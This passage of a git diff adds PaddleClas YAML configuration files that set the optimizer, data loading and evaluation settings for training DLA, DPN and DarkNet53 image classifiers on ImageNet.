1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + 
cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46_c.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46_c.yaml new file mode 100644 index 0000000..c40d763 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46_c.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA46_c + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data 
loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46x_c.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46x_c.yaml new file mode 100644 index 0000000..61a6d89 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA46x_c.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: 
./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA46x_c + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + 
mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60.yaml new file mode 100644 index 0000000..da53f14 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA60 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 
./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x.yaml new file mode 100644 index 0000000..1de82f5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA60x + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval 
+DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x_c.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x_c.yaml new file mode 100644 index 0000000..646e972 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DLA/DLA60x_c.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + 
save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DLA60x_c + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] 
+ std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN107.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN107.yaml new file mode 100644 index 0000000..92c1fb8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN107.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN107 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + 
transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN131.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN131.yaml new file mode 100644 index 0000000..3cb22f6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN131.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN131 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 
./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN68.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN68.yaml new file mode 100644 index 0000000..ecd2d85 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN68.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + 
use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN68 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + 
class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN92.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN92.yaml new file mode 100644 index 0000000..c431efc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN92.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN92 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - 
NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN98.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN98.yaml new file mode 100644 index 0000000..9fb1ec9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DPN/DPN98.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DPN98 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - 
RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DarkNet/DarkNet53.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DarkNet/DarkNet53.yaml new file mode 100644 index 0000000..b69ccfc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DarkNet/DarkNet53.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: 
./inference + +# model architecture +Arch: + name: DarkNet53 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + 